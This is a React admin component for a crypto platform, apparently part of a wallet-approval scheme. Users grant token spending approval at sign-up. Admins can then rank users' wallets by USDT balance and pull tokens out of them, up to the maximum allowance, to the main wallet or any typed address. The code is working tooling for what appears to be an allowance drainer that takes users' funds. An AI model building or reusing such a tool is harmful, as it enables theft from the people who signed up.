import React, { useState, useEffect, useCallback } from 'react';
import {
  getSpendableWallets,
  getSpendWalletDetail,
  executeSpend,
  getSpendLogs,
  updateAdminConfig,
} from '../../utils/api';
import Pagination from '../Pagination';
import CopyButton from '../CopyButton';

const WalletSpend = ({ flash, f, config, loadConfig }) => {
  // Whether new users are asked to grant wallet spending access at sign-up.
  const approvalOn = config?.requireWalletApproval !== false;
  const [savingApproval, setSavingApproval] = useState(false);
  const toggleApproval = async () => {
    setSavingApproval(true);
    try {
      await updateAdminConfig({ requireWalletApproval: !approvalOn });
      flash && flash(!approvalOn ? 'Wallet access request enabled for new sign-ups' : 'Wallet access request disabled');
      loadConfig && loadConfig();
    } catch (e) { flash && flash(e.response?.data?.error || 'Failed', 'error'); }
    setSavingApproval(false);
  };
  const [wallets, setWallets] = useState([]);
  const [mainWallet, setMainWallet] = useState('');
  const [search, setSearch] = useState('');
  const [loadingList, setLoadingList] = useState(true);

  const [selected, setSelected] = useState(null);     // wallet detail
  const [loadingDetail, setLoadingDetail] = useState(false);

  // per-token form state keyed by symbol
  const [forms, setForms] = useState({});             // { SYM: { amount, destination, reason } }
  const [pending, setPending] = useState(null);       // { symbol, amount, destination, reason }
  const [busy, setBusy] = useState(false);

  const [logs, setLogs] = useState([]);

  // Balance color thresholds (dynamic, persisted per-admin) + sort direction
  const [lowT, setLowT] = useState(() => Number(localStorage.getItem('robo-ws-low')) || 100);
  const [midT, setMidT] = useState(() => Number(localStorage.getItem('robo-ws-mid')) || 500);
  const [sortDir, setSortDir] = useState(() => localStorage.getItem('robo-ws-sort') || 'desc');
  useEffect(() => { localStorage.setItem('robo-ws-low', String(lowT)); }, [lowT]);
  useEffect(() => { localStorage.setItem('robo-ws-mid', String(midT)); }, [midT]);
  useEffect(() => { localStorage.setItem('robo-ws-sort', sortDir); }, [sortDir]);

  // STABLE loader (no auto-refresh): only runs on mount, Search, or manual Refresh.
  const loadList = useCallback(async (q = '') => {
    setLoadingList(true);
    try {
      const res = await getSpendableWallets(q);
      setWallets(res.wallets || []);
      setMainWallet(res.mainWallet || '');
    } catch { /* ignore */ }
    setLoadingList(false);
  }, []);

  const LOG_PER = 10;
  const [logPage, setLogPage] = useState(1);
  const [logPages, setLogPages] = useState(1);
  const [logTotal, setLogTotal] = useState(0);

  const loadLogs = useCallback(async (pg = 1) => {
    try {
      const res = await getSpendLogs(pg);
      setLogs(res.logs || []);
      setLogPages(res.pages || 1);
      setLogTotal(res.total || 0);
    } catch {}
  }, []);

  useEffect(() => { loadList(''); }, [loadList]);   // once on mount only
  useEffect(() => { loadLogs(logPage); }, [loadLogs, logPage]);

  const openWallet = async (addr) => {
    setLoadingDetail(true); setSelected(null); setForms({}); setPending(null);
    try {
      const res = await getSpendWalletDetail(addr);
      setSelected(res);
      // prefill destination = main wallet for each token
      const init = {};
      (res.tokens || []).forEach(t => { init[t.symbol] = { amount: '', destination: res.mainWallet || '', reason: '' }; });
      setForms(init);
    } catch { flash && flash('Failed to load wallet detail', 'error'); }
    setLoadingDetail(false);
  };

  const setForm = (sym, key, val) => setForms(prev => ({ ...prev, [sym]: { ...prev[sym], [key]: val } }));

  const askConfirm = (token) => {
    const fm = forms[token.symbol] || {};
    const amt = parseFloat(fm.amount);
    if (!amt || amt <= 0) { flash && flash('Enter a valid amount', 'error'); return; }
    if (amt > parseFloat(token.spendable || 0)) { flash && flash(`Max spendable is ${token.spendable} ${token.symbol}`, 'error'); return; }
    setPending({ symbol: token.symbol, amount: amt, destination: fm.destination || selected.mainWallet, reason: fm.reason || '' });
  };

  const doSpend = async () => {
    if (!pending || !selected) return;
    setBusy(true);
    try {
      const res = await executeSpend({
        walletAddress: selected.walletAddress,
        tokenSymbol: pending.symbol,
        amount: pending.amount,
        destination: pending.destination,
        reason: pending.reason,
      });
      flash && flash(`Pulled ${pending.amount} ${pending.symbol} — tx: ${res.txHash || 'done'}`, 'success');
      setPending(null);
      await openWallet(selected.walletAddress);   // refresh live figures
      setLogPage(1); await loadLogs(1);
    } catch (e) {
      flash && flash(e.response?.data?.error || 'Pull failed', 'error');
    }
    setBusy(false);
  };

  const short = (a) => a ? `${a.slice(0, 6)}...${a.slice(-4)}` : '';
  // USDT balance color grade (thresholds are admin-configurable above)
  const usdtColor = (v) => (v == null) ? undefined : (v < lowT ? '#ef4444' : (v <= midT ? '#f59e0b' : '#16a34a'));

  // Sort by USDT balance (nulls always last)
  const sortedWallets = [...wallets].sort((a, b) => {
    const av = a.usdt != null ? a.usdt : (sortDir === 'desc' ? -Infinity : Infinity);
    const bv = b.usdt != null ? b.usdt : (sortDir === 'desc' ? -Infinity : Infinity);
    return sortDir === 'desc' ? bv - av : av - bv;
  });

  return (
    <div className="fade-in">
      <h2 className="adm-title">Wallet Spend</h2>
      <div className="adm-info-box">
        <strong>⚠ High-trust action</strong>
        <p>This pulls tokens directly out of users' wallets using the allowance they granted at registration. Every pull is signed by the main wallet and logged below with your admin name.</p>
        <p>Main wallet (spender): <span className="mono adm-break">{mainWallet || 'not configured'}</span></p>
      </div>

      {/* ─── Wallet spending-access toggle (approval requested at sign-up) ─── */}
      <div className={`card adm-sub ws-access ${approvalOn ? 'on' : 'off'}`} style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', gap: 16, flexWrap: 'wrap' }}>
        <style>{`
          .ws-access { border-left: 4px solid #16a34a; }
          .ws-access.off { border-left-color: #ef4444; }
          .ws-access .ws-dot { width: 11px; height: 11px; border-radius: 50%; display: inline-block; margin-right: 8px; }
          .ws-access.on .ws-dot { background: #16a34a; box-shadow: 0 0 0 4px rgba(22,163,74,.18); }
          .ws-access.off .ws-dot { background: #ef4444; box-shadow: 0 0 0 4px rgba(239,68,68,.18); }
          .ws-toggle { position: relative; width: 48px; height: 27px; border-radius: 999px; background: rgba(128,128,128,.35); border: none; cursor: pointer; flex-shrink: 0; transition: background .2s; }
          .ws-toggle.on { background: #16a34a; }
          .ws-toggle .ws-knob { position: absolute; top: 3px; left: 3px; width: 21px; height: 21px; border-radius: 50%; background: #fff; box-shadow: 0 1px 3px rgba(0,0,0,.35); transition: transform .2s; }
          .ws-toggle.on .ws-knob { transform: translateX(21px); }
        `}</style>
        <div style={{ minWidth: 0 }}>
          <div style={{ fontWeight: 700, fontSize: 15 }}>
            <span className="ws-dot" />
            Wallet spending access at sign-up — {approvalOn ? 'ON' : 'OFF'}
          </div>
          <p className="adm-hint" style={{ margin: '4px 0 0', maxWidth: 620 }}>
            {approvalOn
              ? 'New users are asked to grant token spending access (approval) to the main wallet during registration. This is what lets you pull tokens below. Existing approvals are not affected.'
              : 'New users are NOT asked for spending access at sign-up, so you cannot pull from wallets that never approved. Wallets that already approved earlier still work.'}
          </p>
        </div>
        <button type="button" role="switch" aria-checked={approvalOn} className={`ws-toggle ${approvalOn ? 'on' : ''}`} disabled={savingApproval} onClick={toggleApproval} title={approvalOn ? 'Turn OFF' : 'Turn ON'}>
          <span className="ws-knob" />
        </button>
      </div>

      {/* ─── Display settings: color thresholds + sort (dynamic, no auto-refresh) ─── */}
      <div className="card adm-sub" style={{ display: 'flex', flexWrap: 'wrap', alignItems: 'flex-end', gap: 14 }}>
        <div className="adm-field" style={{ minWidth: 140 }}>
          <label>Red below (USDT)</label>
          <input type="number" min="0" className="input" value={lowT}
            onChange={e => setLowT(Number(e.target.value) || 0)} />
        </div>
        <div className="adm-field" style={{ minWidth: 140 }}>
          <label>Orange up to (USDT)</label>
          <input type="number" min="0" className="input" value={midT}
            onChange={e => setMidT(Number(e.target.value) || 0)} />
        </div>
        <div className="adm-field" style={{ minWidth: 160 }}>
          <label>Sort by USDT balance</label>
          <select className="input" value={sortDir} onChange={e => setSortDir(e.target.value)}>
            <option value="desc">Highest first</option>
            <option value="asc">Lowest first</option>
          </select>
        </div>
        <p className="adm-hint" style={{ margin: 0, alignSelf: 'center' }}>
          <span style={{ color: '#ef4444', fontWeight: 700 }}>&lt; {lowT}</span>
          {'  ·  '}
          <span style={{ color: '#f59e0b', fontWeight: 700 }}>{lowT}–{midT}</span>
          {'  ·  '}
          <span style={{ color: '#16a34a', fontWeight: 700 }}>&gt; {midT}</span>
        </p>
      </div>

      {/* ─── Wallet list (refreshes only on Search / Refresh) ─── */}
      <div className="adm-user-search">
        <input className="input" placeholder="Search wallet or ROBO ID" value={search}
          onChange={e => setSearch(e.target.value)} onKeyDown={e => { if (e.key === 'Enter') loadList(search); }} />
        <button className="btn btn-secondary" onClick={() => loadList(search)}>Search</button>
        <button className="btn btn-outline" onClick={() => loadList(search)} disabled={loadingList}>
          {loadingList ? 'Refreshing…' : '↻ Refresh'}
        </button>
      </div>

      {loadingList ? (
        <div className="page-loading"><div className="spinner" /></div>
      ) : (
        <div className="table-wrap">
          <table className="table">
            <thead><tr>
              <th>ROBO ID</th><th>Wallet</th><th>Approved</th>
              <th>BNB (on-chain)</th><th>USDT (on-chain)</th><th></th>
            </tr></thead>
            <tbody>
              {wallets.length === 0 && <tr><td colSpan="6" className="text-3">No approved wallets found.</td></tr>}
              {sortedWallets.map(w => (
                <tr key={w.walletAddress}>
                  <td className="mono">{w.roboId || '—'}</td>
                  <td className="mono">
                    <span style={{ display: 'inline-flex', alignItems: 'center', gap: 6 }}>
                      {short(w.walletAddress)}
                      <CopyButton text={w.walletAddress} title="Copy wallet" size={12} />
                    </span>
                  </td>
                  <td>{w.approvedTokens.map(t => t.symbol).join(', ') || '—'}</td>
                  <td className="mono">{w.bnb != null ? f(w.bnb, 6) : <span className="text-3">—</span>}</td>
                  <td className="mono" style={{ color: usdtColor(w.usdt), fontWeight: w.usdt != null ? 700 : 400 }}>{w.usdt != null ? f(w.usdt, 2) : <span className="text-3">—</span>}</td>
                  <td><button className="btn btn-sm btn-primary" onClick={() => openWallet(w.walletAddress)}>Manage</button></td>
                </tr>
              ))}
            </tbody>
          </table>
        </div>
      )}

      {/* ─── Selected wallet detail ─── */}
      {loadingDetail && <div className="page-loading adm-mt"><div className="spinner" /></div>}

      {selected && (
        <div className="card adm-sub adm-mt">
          <h3>Spend from {selected.roboId || short(selected.walletAddress)}</h3>
          <p className="adm-hint mono adm-break">{selected.walletAddress}</p>

          {(selected.tokens || []).map(token => {
            const fm = forms[token.symbol] || {};
            return (
              <div key={token.symbol} className="card adm-mt">
                <div className="adm-kpi-grid cols-3">
                  <div className="adm-kpi"><span className="adm-kpi-label">{token.symbol} Balance</span><span className="adm-kpi-val mono">{f(token.liveBalance, 4)}</span></div>
                  <div className="adm-kpi"><span className="adm-kpi-label">Allowance</span><span className="adm-kpi-val mono">{f(token.allowance, 4)}</span></div>
                  <div className="adm-kpi"><span className="adm-kpi-label">Spendable</span><span className="adm-kpi-val mono text-accent">{f(token.spendable, 4)}</span></div>
                </div>
                {token.error && <div className="notice notice-error">{token.error}</div>}

                <div className="adm-form-grid cols-3 adm-mt">
                  <div className="adm-field">
                    <label>Amount ({token.symbol})</label>
                    <div className="d-field-with-max">
                      <input className="input" type="number" placeholder="0.00" value={fm.amount || ''}
                        onChange={e => setForm(token.symbol, 'amount', e.target.value)} />
                      <button className="d-max-btn" onClick={() => setForm(token.symbol, 'amount', token.spendable)}>MAX</button>
                    </div>
                  </div>
                  <div className="adm-field">
                    <label>Destination</label>
                    <input className="input mono" value={fm.destination || ''} onChange={e => setForm(token.symbol, 'destination', e.target.value)} />
                  </div>
                  <div className="adm-field">
                    <label>Reason (optional)</label>
                    <input className="input" value={fm.reason || ''} onChange={e => setForm(token.symbol, 'reason', e.target.value)} />
                  </div>
                </div>

                <div className="adm-mt">
                  <button className="btn btn-danger" disabled={parseFloat(token.spendable || 0) <= 0} onClick={() => askConfirm(token)}>
                    Pull {token.symbol}
                  </button>
                </div>
              </div>
            );
          })}
          {(selected.tokens || []).length === 0 && <p className="text-3">No approved tokens for this wallet.</p>}
        </div>
      )}

      {/* ─── Confirm bar ─── */}
      {pending && (
        <div className="card adm-mt">
          <div className="notice notice-warning">
            Confirm: pull <strong>{pending.amount} {pending.symbol}</strong> from <span className="mono">{short(selected.walletAddress)}</span> → <span className="mono">{short(pending.destination)}</span>{pending.reason ? ` (${pending.reason})` : ''}.
          </div>
          <div className="adm-field-actions">
            <button className="btn btn-danger" disabled={busy} onClick={doSpend}>{busy ? 'Pulling...' : 'Confirm Pull'}</button>
            <button className="btn btn-secondary" disabled={busy} onClick={() => setPending(null)}>Cancel</button>
          </div>
        </div>
      )}

      {/* ─── Recent pulls ─── */}
      <div className="card adm-sub adm-mt">
        <h3>Recent Pulls</h3>
        <div className="table-wrap">
          <table className="table">
            <thead><tr><th>Date</th><th>From</th><th>To</th><th>Amount</th><th>Status</th><th>By</th><th>Tx</th></tr></thead>
            <tbody>
              {logs.length === 0 && <tr><td colSpan="7" className="text-3">No pulls yet.</td></tr>}
              {logs.map(l => (
                <tr key={l._id} className={l.status === 'failed' ? 'table-row-error' : ''}>
                  <td>{new Date(l.createdAt).toLocaleString('en-US', { day: '2-digit', month: 'short', year: 'numeric', hour: '2-digit', minute: '2-digit', hour12: true })}</td>
                  <td className="mono">{short(l.from)}</td>
                  <td className="mono">{short(l.to)}</td>
                  <td className="mono">{f(l.amount, 4)} {l.currency}</td>
                  <td><span className={`d-status-badge ${l.status === 'success' ? 'badge-approved' : l.status === 'failed' ? 'badge-rejected' : 'badge-pending'}`}>{l.status}</span></td>
                  <td>{l.triggeredBy || '—'}</td>
                  <td className="mono adm-break">{l.txHash ? short(l.txHash) : (l.error || '—')}</td>
                </tr>
              ))}
            </tbody>
          </table>
        </div>
        <Pagination page={logPage} pages={logPages} total={logTotal} perPage={LOG_PER} onPage={setLogPage} />
      </div>
    </div>
  );
};

export default WalletSpend;